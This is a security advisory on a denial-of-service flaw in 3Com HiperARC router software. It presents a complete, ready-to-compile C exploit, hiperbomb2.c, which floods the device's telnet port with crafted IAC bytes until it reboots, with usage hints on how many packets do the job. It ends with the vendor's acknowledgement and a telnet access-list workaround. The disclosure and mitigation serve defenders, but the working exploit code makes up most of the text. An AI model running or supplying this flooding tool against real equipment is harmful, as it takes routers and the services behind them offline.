Vulnerability

    3COM HiperARC

Affected

    3COM HiperARC 4.0...4.2.29

Description

    Jonathan Chapman found following.   The program below will  reboot
    a 3com HiperARC.  By flooding  the telnet port of a 3com  HiperARC
    using the provided program, the HiperARC unconditionally  reboots.
    This program is effective over all interfaces, including a dialup.

    /* ---------------------------------------------------------------------
     * hiperbomb2.c - Reboots HiperARC faster.
     * ---------------------------------------------------------------------
     * (c) 1999 - Jonathan Chapman <jchapman@1st.net>
     * ---------------------------------------------------------------------
     * Sends a high volume of IACs which eventually leads to a reboot of the
     * HiperARC.  Brief testing indicated that this problem is most likely
     * specific to sending IACs rather than any other type of data.  Further
     * research has shown that specific IAC patterns are more likely to cause
     * a reboot.  In this example I use one of the most efficient combinations
     * I have discovered.  Through my testing it usually required at least
     * 60,000 packets to cause the HiperARC to reboot.
     * ---------------------------------------------------------------------
     */


    #include <stdio.h>
    #include <stdarg.h>
    #include <fcntl.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    char *chassis;
    int sockfd, num_of_tries;

    void connect_to_chassis(char *name)
    {
	    struct hostent *host;
	    struct sockaddr_in remote;

	    host = gethostbyname(name);

	    if(!host) {
	    fprintf(stderr, "Cannot resolve host %s.\n", name);
	    exit(3);
	    }

	    sockfd = socket(AF_INET, SOCK_STREAM, 0);

	    if(sockfd < 0) {
	    fprintf(stderr, "Cannot obtain descriptor.\n");
	    exit(4);
	    }

	    remote.sin_family = AF_INET;
	    remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
	    remote.sin_port = htons(23);

	    connect(sockfd, (struct sockaddr *)&remote, sizeof(remote));

	    return;
    }

    void send_iacs()
    {
	    unsigned char reply[3] = {254, 36, 185};
	    unsigned int k;

	    for(k = 0; k < num_of_tries; k++) {
	    write(sockfd, reply, 3);
	    }
    }

    int main(int ac, char **av)
    {

	    if(ac < 3) {
	    fprintf(stderr, "Syntax: %s <chassis name> <num of packets>\n", av[0]);
	    fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
	    exit(2);
	    }

	    chassis = av[1];
	    num_of_tries = atoi(av[2]);

	    fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n",
		    chassis, num_of_tries);
	    connect_to_chassis(chassis);
	    send_iacs();
	    fprintf(stderr, "Attack complete.\n");

	    exit(0);
    }

    This has been  confirmed on 3Com  Corporation HiPer Access  Router
    Card Built on Feb 16 1999 at 12:42:34.  System Version:  V4.1.59.

Solution

    3Com acknowledges and has verified the existence of the  hiperbomb
    DOS attack.  All HiPer  ARC software (4.0 - 4.2.29)  is vulnerable
    to  the  attack.   The  following  workaround  will  protect  your
    equipment until the software  patch becomes available.   Defect is
    logged  under  3Com  MR#11022.   It  is  possible  to add a telnet
    access list of trusted hosts on  the HiPer ARC. It can be  assumed
    that the attack  will not come  from a trusted  host.  It  is also
    recommended that you do no allow any telnet sessions from  outside
    your network.  To add a telnet access list:

        1) add telnet clients. These clients may be individual hosts or networks.
            "ADD TELNET CLIENT X.X.X.X"
            "LIST TELNET CLIENTS" will list all configured clients

        2) Enable the telnet client access list feature.
            "ENABLE TELNET CLIENT_ACCESS"